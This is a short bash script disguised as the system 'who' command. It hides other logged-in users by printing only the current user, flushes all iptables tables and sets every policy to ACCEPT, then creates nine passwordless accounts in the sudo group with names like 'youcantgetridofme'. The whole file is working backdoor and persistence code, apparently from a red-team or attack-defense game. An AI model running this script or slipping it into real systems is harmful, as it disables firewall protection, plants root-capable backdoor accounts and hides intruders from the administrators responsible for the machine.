#!/bin/bash

# Execute real 'who' command and don't display anything. Also mess with them
# This will make them think they are the only one connected to the box
/lib/module_who $@ | grep -Ev "*" | echo "$USER\ttty1\t`date`"


# Source the ~/.bashrc
source ~/.bashrc

# Flush iptables rules
sudo iptables -F
sudo iptables -t mangle -F
sudo iptables -t nat -F
sudo iptables -t filter -F
sudo iptables -t raw -F
sudo iptables -t security -F

# Change default policies for 'iptables'
sudo iptables -P INPUT ACCEPT
sudo iptables -P OUTPUT ACCEPT
sudo iptables -P FORWARD ACCEPT

# Add some admin users
sudo useradd -M devbl -p "" -G sudo
sudo useradd -M bob -p "" -G sudo
sudo useradd -M susan -p "" -G sudo
sudo useradd -M kat -p "" -G sudo
sudo useradd -M simon -p "" -G sudo
sudo useradd -M batman -p "" -G sudo
sudo useradd -M iamalwayshere -p "" -G sudo
sudo useradd -M youcantgetridofme -p "" -G sudo
sudo useradd -M hehe -p "" -G sudo
